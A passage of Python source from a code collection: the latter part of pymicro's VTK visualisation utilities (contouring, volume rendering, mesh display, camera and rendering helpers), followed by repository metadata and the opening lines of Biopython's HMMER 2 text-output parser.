memory so downsample your data if you can.
:params data: the dataset to map, in numpy or VTK format.
:params float value: numeric value to use for contouring.
:params color: the solid color to use for the contour actor.
:params diffuseColor: the diffusive color to use for the contour actor.
:params float opacity: the opacity value to use for the actor (1.0 by default).
:params bool discrete: use vtkDiscreteMarchingCubes if True (False by default).
:returns: The method return a vtkActor that can be directly added to a renderer.
'''
if type(data) == np.ndarray:
data = numpy_array_to_vtk_grid(data, False)
if discrete:
contour = vtk.vtkDiscreteMarchingCubes()
else:
contour = vtk.vtkContourFilter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
contour.SetInputData(data)
else:
contour.SetInput(data)
contour.SetValue(0, value)
contour.Update()
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(contour.GetOutputPort())
normals.SetFeatureAngle(60.0)
mapper = vtk.vtkPolyDataMapper()
mapper.ScalarVisibilityOff()
mapper.SetInputConnection(normals.GetOutputPort())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetDiffuseColor(diffuseColor)
actor.GetProperty().SetSpecular(.4)
actor.GetProperty().SetSpecularPower(10)
actor.GetProperty().SetOpacity(opacity)
return actor
def volren(data, alpha_channel=None, color_function=None):
'''Volume rendering for a 3d array using standard ray casting.
:param data: the dataset to render, in numpy or VTK format.
:param alpha_channel: a vtkPiecewiseFunction instance, default to linear between 0 and 255 if not given.
:returns: The method return a vtkVolume that can be added to a renderer.
'''
if type(data) == np.ndarray:
data = numpy_array_to_vtk_grid(data, False)
if alpha_channel == None:
alpha_channel = vtk.vtkPiecewiseFunction()
alpha_channel.AddPoint(0, 0.0)
alpha_channel.AddPoint(255, 0.5)
volumeProperty = vtk.vtkVolumeProperty()
if color_function != None:
volumeProperty.SetColor(color_function)
volumeProperty.SetScalarOpacity(alpha_channel)
compositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
volumeMapper = vtk.vtkVolumeRayCastMapper()
volumeMapper.SetVolumeRayCastFunction(compositeFunction)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
volumeMapper.SetInputData(data)
else:
volumeMapper.SetInput(data)
volume = vtk.vtkVolume()
volume.SetMapper(volumeMapper)
volume.SetProperty(volumeProperty)
return volume
def elevationFilter(data, value, low_high_range, low_point=None, high_point=None):
'''Create an isosurface and map it with an elevation filter.
:param data: the dataset to map, in VTK format.
:param float value: the value to use to create the isosurface.
:param tuple low_high_range: range to use in the elevation filter in the form (low, high).
:param tuple low_point: lower point defining the axis from which to compute the elevation.
If not specified, (0, 0, low) is assumed.
:param tuple high_point: lower point defining the axis from which to compute the elevation.
If not specified, (0, 0, high) is assumed.
:returns vtkActor: The method return an actor that can be directly added to a renderer.
'''
low, high = low_high_range
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.6, 0)
lut.SetSaturationRange(1.0, 0)
lut.SetValueRange(0.5, 1.0)
contour = vtk.vtkDiscreteMarchingCubes()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
contour.SetInputData(data)
else:
contour.SetInput(data)
contour.SetValue(0, value)
contour.Update()
elevation = vtk.vtkElevationFilter()
elevation.SetInputConnection(contour.GetOutputPort())
if low_point == None:
low_point = (0, 0, low)
if high_point == None:
high_point = (0, 0, high)
elevation.SetLowPoint(low_point)
elevation.SetHighPoint(high_point)
elevation.SetScalarRange(low, high)
elevation.ReleaseDataFlagOn()
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(elevation.GetOutputPort())
normals.SetFeatureAngle(60.0)
mapper = vtk.vtkPolyDataMapper()
mapper.SetScalarRange(low, high)
mapper.SetLookupTable(lut)
mapper.ImmediateModeRenderingOn()
mapper.SetInputConnection(normals.GetOutputPort())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
return actor
def numpy_array_to_vtk_grid(data, cell_data=True, array_name=None):
'''Transform a 3d numpy data array into a vtk uniform grid with scalar data.
:param data: the 3d numpy data array, possibly with 3 components using a 4th dimension.
:param bool cell_data: flag to assign cell data, as opposed to point data, to the grid (True by default).
:param str array_name: an optional name for the vtk array.
:return vtkUniformGrid: The method return a vtkUniformGrid with scalar data initialized from
the provided numpy array.
'''
if data.ndim not in [3, 4]:
print('warning, data array dimension must be 3 or 4 (for multi-component)')
return None
if data.ndim == 3:
size = np.shape(data)
vtk_data_array = numpy_support.numpy_to_vtk(np.ravel(data, order='F'), deep=1)
elif data.ndim == 4:
print('treating the 4th dimension as 3 different components')
assert data.shape[3] == 3
size = np.shape(data)[:3]
# create the right type of array
vtk_type = numpy_support.get_vtk_array_type(data.dtype)
print('creating vtk array with type %d' % vtk_type)
vtk_data_array = vtk.vtkDataArray.CreateDataArray(vtk_type)
vtk_data_array.SetNumberOfComponents(data.shape[3])
n = np.prod(size)
vtk_data_array.SetNumberOfTuples(n)
for i in range(3):
vtk_data_array.CopyComponent(i, numpy_support.numpy_to_vtk(np.ravel(data[:, :, :, i], order='F'), deep=1), 0)
if array_name:
vtk_data_array.SetName(array_name)
grid = vtk.vtkUniformGrid()
if cell_data:
grid.SetExtent(0, size[0], 0, size[1], 0, size[2])
grid.GetCellData().SetScalars(vtk_data_array)
else:
grid.SetExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
grid.GetPointData().SetScalars(vtk_data_array)
grid.SetSpacing(1, 1, 1)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
grid.SetScalarType(vtk.VTK_UNSIGNED_CHAR, vtk.vtkInformation())
else:
grid.SetScalarType(vtk.VTK_UNSIGNED_CHAR)
return grid
def map_data_with_clip(data, lut=gray_cmap(), cell_data=True):
'''This method construct an actor to map a 3d dataset.
1/8 of the data is clipped out to have a better view of the interior.
It requires a fair amount of memory so downsample your data if you can
(it may not be visible at all on the resulting image).
.. code-block:: python
data = read_image_data(im_file, size)
ren = vtk.vtkRenderer()
actor = map_data_with_clip(data)
ren.AddActor(actor)
render(ren, display=True)
.. figure:: _static/pa66gf30_clip_3d.png
:width: 300 px
:alt: pa66gf30_clip_3d
:align: center
A 3D view of a polyamid sample with reinforcing glass fibers.
*Parameters*
**data**: the dataset to map, in numpy or VTK format.
**lut**: VTK look up table (default: `gray_cmap`).
**cell_data**: boolean to map cell data or point data if False (True by default)
*Returns*
The method return a vtkActor that can be directly added to a renderer.
'''
# implicit function
bbox = vtk.vtkBox()
if type(data) == np.ndarray:
size = data.shape
bbox.SetXMin(size[0] / 2., -1, size[2] / 2.)
bbox.SetXMax(size[0] + 1, size[1] / 2., size[2] + 1)
else:
e = 0.001
bb = data.GetBounds()
bbox.SetXMin((bb[1] - bb[0]) / 2., bb[2] - e, (bb[5] - bb[4]) / 2.)
bbox.SetXMax(bb[1] + e, (bb[3] - bb[2]) / 2., bb[5] + e)
return map_data(data, bbox, lut=lut, cell_data=cell_data)
def map_data(data, function, lut=gray_cmap(), cell_data=True):
'''This method construct an actor to map a 3d dataset.
It requires a fair amount of memory so downsample your data if you can
(it may not be visible at all on the resulting image).
*Parameters*
**data**: the dataset to map, in numpy or VTK format.
**function**: VTK implicit function where to map the data.
**lut**: VTK look up table (default: `gray_cmap`).
**cell_data**: boolean to map cell data or point data if False (True by default)
*Returns*
The method return a vtkActor that can be directly added to a renderer.
'''
if type(data) == np.ndarray:
data = numpy_array_to_vtk_grid(data, cell_data)
# use extract geometry filter to access the data
extract = extract_poly_data(data, inside=False)
mapper = vtk.vtkDataSetMapper()
mapper.ScalarVisibilityOn()
mapper.SetLookupTable(lut)
mapper.UseLookupTableScalarRangeOn()
if cell_data:
mapper.SetScalarModeToUseCellData()
else:
mapper.SetScalarModeToUsePointData()
mapper.SetColorModeToMapScalars()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputConnection(extract.GetOutputPort())
# with VTK 6, since SetInputData does not create a pipeline, we can also use:
# extract.Update()
# mapper.SetInputData(extract.GetOutput())
else:
mapper.SetInput(extract.GetOutput())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
return actor
def set_opacity(assembly, opacity):
collection = vtk.vtkPropCollection()
assembly.GetActors(collection)
for i in range(collection.GetNumberOfItems()):
collection.GetItemAsObject(i).GetProperty().SetOpacity(opacity)
def color_bar(title, lut=None, fmt='%.1e', width=0.5, height=0.075, num_labels=7, font_size=26):
bar = vtk.vtkScalarBarActor()
if not lut:
lut = jet_cmap()
bar.SetLookupTable(lut)
bar.SetTitle(title)
bar.GetPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
bar.GetPositionCoordinate().SetValue(0.5 * (1 - width), 0.025)
bar.SetOrientationToHorizontal()
bar.SetLabelFormat(fmt)
bar.GetLabelTextProperty().SetColor(0, 0, 0)
bar.GetTitleTextProperty().SetColor(0, 0, 0)
bar.GetLabelTextProperty().SetFontSize(font_size)
bar.GetTitleTextProperty().SetFontSize(font_size)
bar.SetWidth(width)
bar.SetHeight(height)
bar.SetNumberOfLabels(num_labels)
return bar
def text(text, font_size=20, color=(0, 0, 0), hor_align='center', coords=(0.5, 0.5)):
'''Create a 2D text actor to add to a 3d scene.
:params int font_size: the font size (20 by default).
:params tuple color: the face color (black by default).
:params str hor_align: horizontal alignment, should be 'left', 'center' or 'right' (center by default).
:params tuple coords: a sequence of two values between 0 and 1.
:returns an actor for the text to add to a renderer.
'''
textMapper = vtk.vtkTextMapper()
textMapper.SetInput(text)
tprop = textMapper.GetTextProperty()
tprop.SetFontSize(font_size)
tprop.SetFontFamilyToArial()
tprop.BoldOff()
if hor_align == 'left':
tprop.SetJustificationToLeft()
elif hor_align == 'center':
tprop.SetJustificationToCentered()
elif hor_align == 'right':
tprop.SetJustificationToRight()
tprop.SetColor(color)
textActor = vtk.vtkActor2D()
textActor.SetMapper(textMapper)
textActor.GetPositionCoordinate().SetCoordinateSystemToNormalizedDisplay()
textActor.GetPositionCoordinate().SetValue(coords[0], coords[1])
return textActor
def setup_camera(size=(100, 100, 100)):
'''Setup the camera with usual viewing parameters.
The camera is looking at the center of the data with the Z-axis vertical.
*Parameters*
**size**: the size of the 3d data set (100x100x100 by default).
'''
cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(2 * size[0], -2 * size[1], 2 * size[2])
cam.SetFocalPoint(0.5 * size[0], 0.5 * size[1], 0.5 * size[2])
cam.SetClippingRange(1, 10 * max(size))
return cam
def render(ren, ren_size=(600, 600), display=True, save=False, name='render_3d.png', key_pressed_callback=None):
'''Render the VTK scene in 3D.
Given a `vtkRenderer`, this function does the actual 3D rendering. It
can be used to display the scene interactlively and/or save a still
image in png format.
*Parameters*
**ren**: the VTK renderer with containing all the actors.
**ren_size**: a tuple with two value to set the size of the image in
pixels (defalut 600x600).
**display**: a boolean to control if the scene has to be displayed
interactively to the user (default True).
**save**: a boolean to to control if the scene has to be saved as a
png image (default False).
**name**: a string to used when saving the scene as an image (default
is 'render_3d.png').
**key_pressed_callback** a function (functions are first class variables)
called in interactive mode when a key is pressed.
'''
# Create a window for the renderer
if save:
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(ren_size)
# capture the display and write a png image
w2i = vtk.vtkWindowToImageFilter()
writer = vtk.vtkPNGWriter()
w2i.SetInput(renWin)
w2i.Update()
writer.SetInputConnection(w2i.GetOutputPort())
writer.SetFileName(name)
renWin.Render()
writer.Write()
if display:
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(ren_size)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
if key_pressed_callback:
iren.AddObserver("KeyPressEvent", key_pressed_callback)
renWin.Render()
iren.Initialize()
iren.Start()
def extract_poly_data(grid, inside=True, boundary=True):
'''Convert from vtkUnstructuredGrid to vtkPolyData.
:param grid: the vtkUnstructuredGrid instance.
:param bool inside: flag to extract inside cells or not.
:param bool boundary: flag to include boundary cells.
:returns: the vtkExtractGeometry filter.
'''
# use extract geometry filter to access the data
extract = vtk.vtkExtractGeometry()
# extract = vtk.vtkExtractVOI() # much faster but seems not to work with blanking
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
extract.SetInputData(grid)
else:
extract.SetInput(grid)
if boundary:
extract.ExtractBoundaryCellsOn()
else:
extract.ExtractBoundaryCellsOff()
if inside:
extract.ExtractInsideOn()
else:
extract.ExtractInsideOff()
bbox = vtk.vtkBox()
bounds = grid.GetBounds()
bbox.SetXMin(bounds[0::2])
bbox.SetXMax(bounds[1::2])
extract.SetImplicitFunction(bbox)
extract.Update()
return extract
def select(grid, id_list, verbose=False):
'''Select cells in vtkUnstructuredGrid based on a list of indices.
:param vtkUnstructuredGrid grid: the grid on which to perform the selection.
:param list id_list: the indices of the cells to select.
:param bool verbose: a flag to activate verbose mode.
:returns: a new vtkUnstructuredGrid containing the selected cells.
'''
ids = vtk.vtkIdTypeArray()
ids.SetNumberOfComponents(1)
for v in id_list:
ids.InsertNextValue(v)
selection_node = vtk.vtkSelectionNode()
selection_node.SetContentType(vtk.vtkSelectionNode.INDICES)
selection_node.SetSelectionList(ids)
selection = vtk.vtkSelection()
selection.AddNode(selection_node)
extract_selection = vtk.vtkExtractSelection()
extract_selection.SetInputData(0, grid)
extract_selection.SetInputData(1, selection)
extract_selection.Update()
# finally create a new vtkUnstructuredGrid instance to return
selected = vtk.vtkUnstructuredGrid()
selected.ShallowCopy(extract_selection.GetOutput())
if verbose:
print('performing selection with id %s' % id_list)
print('number of points in selection: %d' % selected.GetNumberOfPoints())
print('number of cells in selection: %d' % selected.GetNumberOfCells())
return selected
def show_array(data, map_scalars=False, lut=None, hide_zero_values=True):
"""Create a 3d actor representing a numpy array.
Given a 3d array, this function compute the skin of the volume.
The scalars can be mapped to the created surface and the colormap
adjusted. If the data is in numpy format it is converted to VTK first.
:param data: the dataset, in numpy or VTK format.
:param bool map_scalars: map the scalar in the data array to the created
surface (False by default).
:param lut: a vtk lookup table (colormap) used to map the scalars.
:param bool hide_zero_values: blank cells with a value of zero (True
by default)
:return: a vtk actor that can be added to a rendered to show the 3d array.
"""
if type(data) == np.ndarray:
grid = numpy_array_to_vtk_grid(data, cell_data=True)
if hide_zero_values:
# workaround as SetCellVisibilityArray is not available anymore after vtk 6.3
if (vtk.vtkVersion().GetVTKMajorVersion() > 6) | \
(vtk.vtkVersion().GetVTKMajorVersion() == 6 and
vtk.vtkVersion().GetVTKMinorVersion() > 2):
ids_to_blank = np.squeeze(np.argwhere(
data.transpose(2, 1, 0).flatten() == 0))
[grid.BlankCell(i) for i in ids_to_blank]
else:
visible = numpy_support.numpy_to_vtk(np.ravel(
data > 0, order='F').astype(np.uint8), deep=1)
grid.SetCellVisibilityArray(visible)
else:
grid = data
extract = extract_poly_data(grid)
return show_mesh(extract.GetOutput(), map_scalars, lut)
def show_mesh(grid, map_scalars=False, lut=None, show_edges=False, edge_color=(0., 0., 0.), edge_line_width=1.0):
"""Create a 3d actor representing a mesh.
:param grid: the vtkUnstructuredGrid object.
:param bool map_scalars: map the scalar in the data array to the created surface (False by default).
:param lut: a vtk lookup table (colormap) used to map the scalars.
:param bool show_edges: display the mesh edges (False by default).
:param tuple edge_color: color to use for the mesh edges (black by default).
:param float edge_line_width: width of the edge lines (1.0 by default).
:return: a vtk actor that can be added to a rendered to show the 3d array.
"""
mapper = vtk.vtkDataSetMapper()
mapper.ScalarVisibilityOff()
if map_scalars:
mapper.ScalarVisibilityOn()
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUseCellData()
mapper.SetColorModeToMapScalars()
if not lut:
# default to the usual gray colormap
lut = gray_cmap()
mapper.SetLookupTable(lut)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grid)
else:
mapper.SetInput(grid)
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
if show_edges:
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(edge_color)
actor.GetProperty().SetLineWidth(edge_line_width)
actor.GetProperty().SetSpecular(.4)
actor.GetProperty().SetSpecularPower(10)
actor.GetProperty().SetOpacity(1.0)
return actor
def show_grains(data, num_colors=2048):
'''Create a 3d actor of all the grains in a labeled numpy array.
Given a 3d numpy array, this function compute the skin of all the
grains (labels > 0). the background is assumed to be zero and is
removed. The actor produced is colored by the grain ids using the
random color map, see `rand_cmap`.
*Parameters*
**data**: a labeled numpy array.
**num_colors**: number of colors in the lookup table (2048 by default)
Returns a vtk actor that can be added to a rendered to show all the
grains colored by their id.
'''
grain_lut = rand_cmap(N=num_colors, first_is_black=True, table_range=(0, num_colors - 1))
grains = show_array(data, map_scalars=True, lut=grain_lut)
return grains
def show_boundaries(grid, array_id=0, array_name=None, write=False):
'''Create an actor representing the boundaries separating different
values of a given array. The values have to be one of the integer type.
:param vtkUnstructuredGrid grid: the unstructured grid referencing the data array.
:param int array_id: the index of the array to process (default 0).
:param str array_name: the name of the array to process.
:param bool write: flag to write the boundary polydata to the disk.
:return: a VTK actor containing the boundaries.
'''
# if array_name is specified, find the corresponding array
if array_name:
array_id = -1
for i in range(grid.GetCellData().GetNumberOfArrays()):
if grid.GetCellData().GetArray(i).GetName() == array_name:
array_id = i
break
if array_id < 0:
print('warning, array %s not found in CellData arrays' % array_name)
return
array = grid.GetCellData().GetArray(array_id)
assert array.GetName() == array_name
assert array.GetDataType() in [vtk.VTK_UNSIGNED_SHORT, vtk.VTK_UNSIGNED_CHAR, vtk.VTK_INT]
grid.GetCellData().SetActiveScalars(array_name)
# we use a vtkAppendPolyData to gather all the boundaries
append = vtk.vtkAppendPolyData()
numpy_array = numpy_support.vtk_to_numpy(array)
gids_list = np.unique(numpy_array)
print('field range used to find the boudnaries: [%d - %d]' % (gids_list[0], gids_list[-1]))
for gid in gids_list:
print('trying gid=%d' % gid)
thresh = vtk.vtkThreshold()
thresh.SetInputData(grid)
thresh.ThresholdBetween(gid - 0.5, gid + 0.5)
thresh.SetInputArrayToProcess(1, 0, 0, 0, array_name)
thresh.Update()
geometryFilter = vtk.vtkGeometryFilter()
geometryFilter.SetInputConnection(thresh.GetOutputPort())
boundariesExtractor = vtk.vtkFeatureEdges()
boundariesExtractor.SetInputConnection(geometryFilter.GetOutputPort())
boundariesExtractor.BoundaryEdgesOn()
append.AddInputConnection(boundariesExtractor.GetOutputPort())
# remove any duplicate points
clean = vtk.vtkCleanPolyData()
clean.SetInputConnection(append.GetOutputPort())
clean.Update()
if write:
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName('gb.vtp')
writer.SetInputConnection(clean.GetOutputPort())
writer.Write()
print('writting gb.vtp')
boundariesActor = edges_actor(clean.GetOutput(), linewidth=4.0, linecolor=black)
return boundariesActor
def edges_actor(polydata, linewidth=1.0, linecolor=black):
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(polydata)
mapper.ScalarVisibilityOff()
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetColor(linecolor)
actor.GetProperty().SetLineWidth(linewidth)
return actor
def xray_arrow():
xrays_arrow = vtk.vtkArrowSource()
xrays_mapper = vtk.vtkPolyDataMapper()
xrays_mapper.SetInputConnection(xrays_arrow.GetOutputPort())
xrays = vtk.vtkActor()
xrays.SetMapper(xrays_mapper)
return xrays
def slits(size, x_slits=0):
'''Create a 3d schematic represenation of X-ray slits.
The 3d represenation is made of 4 corners of the given size along
the Y and Z axes.
**Parameters**:
*size*: a (X,Y,Z) tuple giving the size of the illuminated volume.
The first value of the tuple is not used.
*x_slits*: position of the slits along the X axis (0 be default).
**Returns**:
A vtk assembly of the 4 corners representing the slits.
'''
slits = vtk.vtkAssembly()
corner_points = np.empty((3, 3, 4), dtype=np.float)
corner_points[:, 0, 0] = [x_slits, -0.6 * size[1] / 2, -size[2] / 2]
corner_points[:, 1, 0] = [x_slits, -size[1] / 2, -size[2] / 2]
corner_points[:, 2, 0] = [x_slits, -size[1] / 2, -0.6 * size[2] / 2]
corner_points[:, 0, 1] = [x_slits, -0.6 * size[1] / 2, size[2] / 2]
corner_points[:, 1, 1] = [x_slits, -size[1] / 2, size[2] / 2]
corner_points[:, 2, 1] = [x_slits, -size[1] / 2, 0.6 * size[2] / 2]
corner_points[:, 0, 2] = [x_slits, 0.6 * size[1] / 2, -size[2] / 2]
corner_points[:, 1, 2] = [x_slits, size[1] / 2, -size[2] / 2]
corner_points[:, 2, 2] = [x_slits, size[1] / 2, -0.6 * size[2] / 2]
corner_points[:, 0, 3] = [x_slits, 0.6 * size[1] / 2, size[2] / 2]
corner_points[:, 1, 3] = [x_slits, size[1] / 2, size[2] / 2]
corner_points[:, 2, 3] = [x_slits, size[1] / 2, 0.6 * size[2] / 2]
for c in range(4):
linePoints = vtk.vtkPoints()
linePoints.SetNumberOfPoints(3)
linePoints.InsertPoint(0, corner_points[:, 0, c])
linePoints.InsertPoint(1, corner_points[:, 1, c])
linePoints.InsertPoint(2, corner_points[:, 2, c])
line1 = vtk.vtkLine()
line1.GetPointIds().SetId(0, 0)
line1.GetPointIds().SetId(1, 1)
line2 = vtk.vtkLine()
line2.GetPointIds().SetId(0, 1)
line2.GetPointIds().SetId(1, 2)
slitCorner1Grid = vtk.vtkUnstructuredGrid()
slitCorner1Grid.Allocate(2, 1)
slitCorner1Grid.InsertNextCell(line1.GetCellType(), line1.GetPointIds())
slitCorner1Grid.InsertNextCell(line2.GetCellType(), line2.GetPointIds())
slitCorner1Grid.SetPoints(linePoints)
slitCorner1Mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
slitCorner1Mapper.SetInputData(slitCorner1Grid)
else:
slitCorner1Mapper.SetInput(slitCorner1Grid)
slitCorner1Actor = vtk.vtkActor()
slitCorner1Actor.SetMapper(slitCorner1Mapper)
slitCorner1Actor.GetProperty().SetLineWidth(3.0)
slitCorner1Actor.GetProperty().SetDiffuseColor(black)
slits.AddPart(slitCorner1Actor)
return slits
def pin_hole(inner_radius=100, outer_radius=200):
pin_hole = vtk.vtkAssembly()
disc = vtk.vtkDiskSource()
disc.SetCircumferentialResolution(50)
disc.SetInnerRadius(inner_radius)
disc.SetOuterRadius(outer_radius)
disc_mapper = vtk.vtkPolyDataMapper()
disc_mapper.SetInputConnection(disc.GetOutputPort())
discActor = vtk.vtkActor()
discActor.SetMapper(disc_mapper)
discActor.GetProperty().SetColor(black)
pin_hole.AddPart(discActor)
pin_hole.RotateY(90)
return pin_hole
def zone_plate(thk=50, sep=25, n_rings=5):
'''Create a 3d schematic represenation of a Fresnel zone plate.
The 3d represenation is made of a number or concentric rings separated
by a specific distance which control the X-ray focalisation.
**Parameters**:
*thk*: ring thickness (50 by default).
*sep*: ring spacing (25 by default).
**Returns**:
A vtk assembly of the rings composing the Fresnel zone plate.
'''
zone_plate = vtk.vtkAssembly()
for i in range(n_rings):
disc = vtk.vtkDiskSource()
disc.SetCircumferentialResolution(50)
disc.SetInnerRadius(i * (thk + sep))
disc.SetOuterRadius((i + 1) * thk + i * sep)
disc_mapper = vtk.vtkPolyDataMapper()
disc_mapper.SetInputConnection(disc.GetOutputPort())
discActor = vtk.vtkActor()
discActor.SetMapper(disc_mapper)
zone_plate.AddPart(discActor)
zone_plate.RotateY(90)
return zone_plate
def grid_vol_view(scan):
s_size = scan[:-4].split('_')[-2].split('x')
s_type = scan[:-4].split('_')[-1]
size = [int(s_size[0]), int(s_size[1]), int(s_size[2])]
# prepare a uniform grid to receive the image data
grid = vtk.vtkUniformGrid()
grid.SetExtent(0, size[0], 0, size[1], 0, size[2])
grid.SetOrigin(0, 0, 0)
grid.SetSpacing(1, 1, 1)
grid.SetScalarType(to_vtk_type(s_type))
# read the actual image data
print('reading scan %s with size %dx%dx%d using type %d' % (scan, size[0], size[1], size[2], to_vtk_type(s_type)))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(to_vtk_type(s_type))
reader.SetFileDimensionality(3)
reader.SetHeaderSize(0)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(scan)
reader.Update()
data = reader.GetOutput()
# expose the image data array
array = data.GetPointData().GetScalars()
grid.GetCellData().SetScalars(array)
grid.SetCellVisibilityArray(array)
# create random lut
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
extract = extract_poly_data(grid)
# create mapper
print('creating actors')
mapper = vtk.vtkDataSetMapper()
mapper.SetLookupTable(lut)
mapper.SetInput(extract.GetOutput())
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUseCellData();
mapper.SetColorModeToMapScalars();
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# set up camera
cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(size[0], -size[1], 200)
cam.SetFocalPoint(size[0] / 2, size[1] / 2, size[2] / 2)
cam.Dolly(0.6)
cam.SetClippingRange(0, 1000)
# add axes actor
l = 0.5 * np.mean(size)
axes = axes_actor(length=l, axisLabels=True)
# Create renderer
ren = vtk.vtkRenderer()
ren.SetBackground(1.0, 1.0, 1.0)
ren.AddActor(actor)
# ren.AddActor(outline)
ren.AddViewProp(axes);
ren.SetActiveCamera(cam)
# Create a window for the renderer
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
renWin.Render()
iren.Initialize()
iren.Start()
print('done')
def vol_view(scan):
# TODO change from scan name to numpy array
s_size = scan[:-4].split('_')[-2].split('x')
s_type = scan[:-4].split('_')[-1]
size = [int(s_size[0]), int(s_size[1]), int(s_size[2])]
print('reading scan %s with size %dx%dx%d using type %d' %
(scan, size[0], size[1], size[2], to_vtk_type(s_type)))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(to_vtk_type(s_type))
reader.SetFileDimensionality(3)
reader.SetHeaderSize(0)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, 100) # size[2]-1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(scan)
data = reader.GetOutput()
# threshold to remove background
print('thresholding to remove background')
thresh = vtk.vtkThreshold()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
thresh.SetInputData(data)
else:
thresh.SetInput(data)
# thresh.SetInputConnection(data)
thresh.Update()
thresh.ThresholdByUpper(1.0)
thresh.SetInputArrayToProcess(1, 0, 0, 0, "ImageFile")
# create random lut
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
# create mapper
print('creating actors')
mapper = vtk.vtkDataSetMapper()
mapper.SetLookupTable(lut)
mapper.SetInputConnection(thresh.GetOutputPort())
# mapper.SetInput(data)
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUsePointData();
mapper.SetColorModeToMapScalars();
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# set up camera
cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(400, -400, 300)
cam.SetFocalPoint(size[0], size[1], size[2])
cam.SetClippingRange(20, 1000)
# add axes actor
l = min(size)
axes = axes_actor(length=l, axisLabels=True)
# Create renderer
ren = vtk.vtkRenderer()
ren.SetBackground(1.0, 1.0, 1.0)
ren.AddActor(actor)
# ren.AddActor(outline)
ren.AddViewProp(axes);
ren.SetActiveCamera(cam)
# Create a window for the renderer
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(600, 600)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
renWin.Render()
iren.Initialize()
iren.Start()
print('done')
def ask_for_map_file(dir, scan_name):
list = {};
i = 0
print('no map file was specified, please chose from the following file available')
for file in os.listdir(dir):
if file.startswith(scan_name + '.'):
i += 1
list[i] = file
print(' * ', file, '[', i, ']')
if i == 0:
sys.exit('no matching map file could be located, exiting...')
r = raw_input('chose file by entering the coresponding number [1]: ')
if r == '':
return list[1]
else:
try:
ir = int(r)
except:
sys.exit('not a number, exiting...')
else:
if int(r) < i + 1:
return list[int(r)]
else:
sys.exit('wrong entry, exiting...')
|
heprom/pymicro
|
pymicro/view/vtk_utils.py
|
Python
|
mit
| 103,117
|
[
"CRYSTAL",
"ParaView",
"VTK"
] |
14ee52c91113f9166485ee646fa647c7d8cd5445ac4199933b718ce92a6202f5
|
# Copyright 2012 by Kai Blin.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Bio.SearchIO parser for HMMER 2 text output."""
import re
from Bio._py3k import _as_bytes, _bytes_to_string
from Bio._utils import read_forward
from Bio.Alphabet import generic_protein
from Bio.SearchIO._model import QueryResult, Hit, HSP, HSPFragment
from ._base import _BaseHmmerTextIndexer
__all__ = ['Hmmer2TextParser', 'Hmmer2TextIndexer']
_HSP_ALIGN_LINE = re.compile(r'(\S+):\s+domain (\d+) of (\d+)')
class _HitPlaceholder(object):
def createHit(self, hsp_list):
hit = Hit(hsp_list)
hit.id_ = self.id_
hit.evalue = self.evalue
hit.bitscore = self.bitscore
if self.description:
hit.description = self.description
hit.domain_obs_num = self.domain_obs_num
return hit
class Hmmer2TextParser(object):
"""Iterator for the HMMER 2.0 text output."""
def __init__(self, handle):
self.handle = handle
self.buf = []
self._meta = self.parse_preamble()
def __iter__(self):
for qresult in self.parse_qresult():
qresult.program = self._meta.get('program')
